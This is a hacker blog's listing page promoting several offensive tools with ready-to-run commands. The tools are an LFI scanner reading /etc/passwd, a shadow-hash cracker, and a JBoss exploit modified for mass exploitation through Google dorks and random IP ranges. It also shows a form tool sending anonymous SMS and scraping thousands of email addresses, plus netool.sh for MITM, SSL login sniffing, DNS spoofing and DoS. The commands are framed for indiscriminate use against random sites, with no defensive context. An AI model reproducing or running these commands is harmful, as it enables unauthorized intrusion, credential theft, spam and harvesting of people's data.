Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador tool. Mostrar todas as postagens
Mostrando postagens com marcador tool. Mostrar todas as postagens

domingo, 5 de julho de 2015

Tool lfiINURL - exploring Local File Inclusion

lfiINURL
Tool Description

The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:
Tool Description  The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:

http://target.br/file.php?open=/etc/passwd
http://target.br/file.php?open=../etc/passwd
http://target.br/file.php?open=../../etc/passwd
http://target.br/file.php?open=../../../etc/passwd
http://target.br/file.php?open=../../../../etc/passwd

AUTOR:        googleINURL
EMAIL:        [email protected]
Blog:         http://blog.inurl.com.br
Twitter:      https://twitter.com/googleinurl
Fanpage:      https://fb.com/InurlBrasil
Pastebin      http://pastebin.com/u/Googleinurl
GIT:          https://github.com/googleinurl
PSS:          http://packetstormsecurity.com/user/googleinurl
YOUTUBE:      http://youtube.com/c/INURLBrasil
PLUS:         http://google.com/+INURLBrasil

Vulnerability Description

Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts,we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

In successful cases If the above mentioned conditions are met, an attacker would see something like the following:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash

Download tool lfiINURL
https://github.com/googleinurl/lfiINURL

COMMAND EXPLOIT --help

   -t : SET TARGET.
   -c : COUNT DIR.
        ex: -c   3 = /etc/passwd, ../etc/passwd, ../../etc/passwd ...
   Execute:
                 php lfiINURL.php -t target.br/index.file?= -c 50

Demonstration execution
Demonstration execution

USE SCANNER INURLBR MASS EXPLOIT COMMAND EXEMPLE
Download scanner inurlbr 1.0
https://github.com/googleinurl/SCANNER-INURLBR

inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'include=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

# OBS USE UNIX

Demonstration execution xpl + inurlbr
Demonstration execution xpl + inurlbr


References
[1] https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
[2] http://www.wikipedia.org/wiki/Local_File_Inclusion
[3] https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

sexta-feira, 3 de julho de 2015

Jameh - Brute Force Hash passwords /etc/shadow

Jameh - Brute Force

Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the / etc / shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password. Jameh was inspired by the tool made by Ricardo Longatto done in C loncrack  to perform a brute-force passwords in hash staying in the / etc / shadow.

Jameh, who actually writes and reads 'Jame' which is the Tupi Guarani means hidden, mysterious, aims to conduct a brute-force hashed passwords contained in the /etc /shadow, passing the salt and hash of the encrypted password he tries to break through the dictionary password.

Creator
Danilo Vaz - UNK
[email protected]
http://unk-br.blogspot.com
https://twitter.com/unknownantisec
http://github.com/danilovazb

Jameh was inspired by the tool made by Ricardo Longatto done in C loncrack  to perform a brute-force passwords in hash staying in the /etc/shadow.

REQUERIMENTS

Import:
threading
time
crypt
argparse
sys
subprocess

permission       Reading & Writing
User                root privilege, or is in the sudoers group
Operating system    LINUX
Python              2.7


INSTALL
git clone http://github.com/danilovazb/jameh

HELP
usage:
jameh.py [-h] [-t 10] -f word_list.txt -s '$6$DgAOLzvU' -ha         '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'

optional arguments:
  -h, --help        show this help message and exit
  -t 10, --threads 10
                    Threads
  -f word_list.txt, --file word_list.txt
                    Opens file with passwords
  -s '$6$DgAOLzvU', --salt '$6$DgAOLzvU'
                    Salt, '$6$DgAOLzvU'
  -ha '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.', --hash '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'
                    hash, '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii
                    6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'

EXAMPLE:
Password: [email protected]#

~# cat /etc/shadow
root:!:16440:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
danilo:$6$DgAOLzvU$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.:16440:0:99999:7:::

COMMAND:
~# python jameh.py --file wl.txt --threads 10 --salt '$6$DgAOLzvU' --hash '$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.'


Ref:

sexta-feira, 19 de junho de 2015

JexBoss - Jboss Verify Tool - INURLBR Mass exploitation -

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server. The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner  All latches and test questions were withdrawn in order to be used in mass was added fução to save vulnerable sites.

Requirements
Python <= 2.7.x

Installation
To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

#  [ + ] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
#  [ + ] Updates: https://github.com/joaomatosf/jexboss
#  [ + ] SCRIPT original: http://1337day.com/exploit/23507 - http://77.120.105.55/exploit/23507
#  [ + ] Free for distribution and modification, but the authorship should be preserved.

Features
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.

The exploitation vectors are:

  1. /jmx-console - tested and working in JBoss versions 4, 5 and 6
  2. /web-console/Invoker- tested and working in JBoss versions 4
  3. /invoker/JMXInvokerServlet- tested and working in JBoss versions 4 and 5

The script works, however ateramos the XPL order to use it in mass along with inurlbr scanner 
All latches and test questions were withdrawn in order to be used in mass was added function to save vulnerable sites.

Mass Exploration: 
To do this we use the scanner inurlbr
Modified script for mass exploitation: 
https://gist.github.com/googleinurl/d9940803b101c9ebbf54#file-jexboss-py 

DORKS SEARCH 

inurl:"jmx-console/HtmlAdaptor"
inurl:"/web-console/Invoker"
inurl:"/invoker/JMXInvokerServlet"

COMMAND INURLBR:
- single search.
--dork {YOU_DORK}

php inurlbr.php --dork 'inurl:"jmx-console/HtmlAdaptor"' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

- search using dorks file 
- File example with dorks:
site:br inurl:"jmx-console/HtmlAdaptor"
site:uk inurl:"jmx-console/HtmlAdaptor"
site:in inurl:"jmx-console/HtmlAdaptor"
site:ru inurl:"jmx-console/HtmlAdaptor"
site:pe inurl:"jmx-console/HtmlAdaptor"
site:br  inurl:"/web-console/Invoker"
site:uk  inurl:"/web-console/Invoker"
site:ru  inurl:"/web-console/Invoker"
site:us  inurl:"/web-console/Invoker"
site:com  inurl:"/web-console/Invoker"
So on .....

Exemple-> File: dorks.txt
--dork-file {YOU_DORKFILE}
php inurlbr.php --dork-file 'dorks.txt' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"


- Using to capture the range of ips--range {IP_START,IP_END}

php inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"
- Range of ips random--range-rand {counter}

php inurlbr.php --range-rand '150' -s output.txt -q all  --unique --command-all "python JexBoss.py  _TARGET_"

Exemple OUTPUT:


quarta-feira, 10 de junho de 2015

Send Attack Web Forms - Tool

DESCRIPTION

The purpose of this tool is to be a Swiss army knife  for anyone who works with HTTP, so far it she is basic, bringing only some of the few features that want her to have, but we can already see in this tool:
  1. - Email Crawler in sites
  2. - Crawler forms on the page
  3. - Crawler links on web pages
  4. - Sending POST and GET
  5. - Support for USER-AGENT
  6. - Support for THREADS
  7. - Support for COOKIES
Developed by

Danilo Vaz - UNK
[email protected]
http://unk-br.blogspot.com
https://twitter.com/unknownantisec


REQUERIMENTS 
----------------------------------------------------------
  • Import:
  • threading
  • time
  • argparse
  • requests
  • json
  • re
  • BeautifulSoup
  • permission          Reading & Writing
  • User                root privilege, or is in the sudoers group
  • Operating system    LINUX
  • Python              2.7 
----------------------------------------------------------

INSTALL

git clone http://github.com/danilovazb/SAWEF

sudo apt-get install python-bs4 python-requests



HELP

usage: tool [-h] --url http://url.com/
[--user_agent '{"User-agent": "Mozilla/5.0 Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8 Gecko/20050511 Firefox/1.0.4"}"]
[--threads 10] [--data '{"data":"value","data1":"value"}']
[--qtd 5] [--method post|get]
[--referer '{"referer": "http://url.com"}']
[--response status_code|headers|encoding|html|json|form]
[--cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=direct|utmccn=direct|utmcmd=none"}']

optional arguments:
  -h, --help        show this help message and exit
  --url http://url.com/
                    URL to request
  --user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}"
                    For a longer list, visit:
                    http://www.useragentstring.com/pages/useragentstring.php
  --threads 10      Threads
  --data '{"data":"value","data1":"value"}'
                    Data to be transmitted by post
  --qtd 5           Quantity requests
  --method post|get
                    Method sends requests
  --referer '{"referer": "http://url.com"}'
                    Referer
  --response status_code|headers|encoding|html|json|form
                    Status return
  --cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)"}'
                    Cookies from site
 

EXAMPLE

*Send 1 SMS anonymous to POST [in BR]:
----------------------------------------------------------
$:> python sawef.py --url "https://smsgenial.com.br/forms_teste/enviar.php" --data '{"celular":"(11) XXXX-XXXXX","mensagem":"Teste","Testar":"Enviar"}' --threads 10 --qtd 1 --user_agent '{"User-agent":"Mozilla/5.0 Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'
*List Form attributes:

----------------------------------------------------------
$:> python sawef.py --url "https://smsgenial.com.br/ --method post --response form
 

 * Get email web pages
----------------------------------------------------------
 $:> python sawef.py --url "http://pastebin.com/ajaYnLYc" --response emails
[...]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
[+] EMAIL = [email protected]
FOUND = 3065

* Get links on web pages

----------------------------------------------------------
$:> python sawef.py --url "http://terra.com.br" --response links
[...]
[+] LINK = http://uol.com.br/https://pagseguro.uol.com.br/vender
[+] LINK = http://www.uolhost.com.br/registro-de-dominio.html
[+] LINK = http://noticias.uol.com.br/arquivohome/
[+] LINK = http://noticias.uol.com.br/erratas/
[+] LINK = http://uol.com.br/#
[+] FOUND = 360


SCREENSHOT:
DESCRIPTION  The purpose of this tool is to be a Swiss army knife  for anyone who works with HTTP, so far it she is basic, bringing only some of the few features that want her to have, but we can already see in this tool:      - Email Crawler in sites     - Crawler forms on the page     - Crawler links on web pages     - Sending POST and GET     - Support for USER-AGENT     - Support for THREADS     - Support for COOKIES  Developed by

Download tool:
https://github.com/danilovazb/SAWEF


REf:
http://unk-br.blogspot.com.br/2015/06/send-attack-web-forms-tool.html

quinta-feira, 5 de dezembro de 2013

Liberado 'netool.sh V3.4' (estável)

netool.sh V3.4

---------------------------------------------------------------------------------------------------------
Liberado 'netool.sh V3.4' (estável)
---------------------------------------------------------------------------------------------------------


netool.sh é um script em bash para automatizar frameworks como Nmap , redes de deriva , sslstrip ,
Metasploit e Ettercap MITM ataques . esse script faz com que seja fácil, tarefas como
SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle , SSLsniff , falsificação de DNS , o outro
módulos disponíveis são:

recuperar metadados do site alvo, ataques DoS dentro da rede externa / local ,
também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto
no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters , também como a habilidade de
capturar imagens de navegação na web -browser na máquina de destino sob ataque MITM e
realiza uma varredura vuln ao web-site -alvo usando websecurify firefox- addon , também
usos [ msfpayload + + msfencode msfcli ] para ter o controle remoto da máquina de destino, também
veio com [ root3.rb ] meterpreter ruby script de auxiliar, e um módulo para instalar / editar
o script meterpreter e atualizar o banco de dados Metasploit automática, busca de
alvos de geolocalização, ou use [ webcrawler.py ] módulo para procurar páginas de login de administrador ,
directorys site, webshells.php plantada no site , scanner vulns upload de arquivo comum
[ LFI ] e procurar XSS sites vuln usando (Dorks,Strings) do google , também usa um módulo para
automatizado alguns ataques mais MITM ( dns- paródia + metasploit + phishing, e uma coleção de
( Metasploit ) exploits automatizados.

Ping remote target or web domain
Show Local Connections (see my machine connections)
Show my Ip address and arp cache
see/change macaddress
change my PC hostname
Scan Local network (search for live hosts inside local network)
search in external lan for hosts
Scan remote host (using nmap to perform a scan to target machine)
execute Nmap command (direct from shell)
search for target geo-location
Open router config page
Ip tracer whois (open website database whois and geo-location)
WebCrawler (open websecurify webcrawler website)
DDoS java Script (perform DDoS attacks external network)
Retrieve metadata (from a web-domain)
Config ettercap (etter.conf))
Launch MITM (using ettercap to perform MITM)
show URLs visited (by target machine under MITM)
Sniff remote pics (by target machine under MITM)
sniff SSL-HTTPS logins
share files in local lan
Dns-Spoofing (redirect web-domains to another ip address)
DoS attack (local netwok)
Compile etter.filters
execute ettercap filter
webcrawler
post-exploitation auxiliary modules
r00tsect0r automated exploits
common user password profiler
d. Delete lock folders
a. about netool
q. quit

Vídeo (version 3.4)


---------------------------------------------------------------------------------------------------------
Confira as novidades
http://sourceforge.net/p/netoolsh/wiki/bug-fixes-release/

Confira o WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/

Projeto:
http://sourceforge.net/projects/netoolsh/
---------------------------------------------------------------------------------------------------------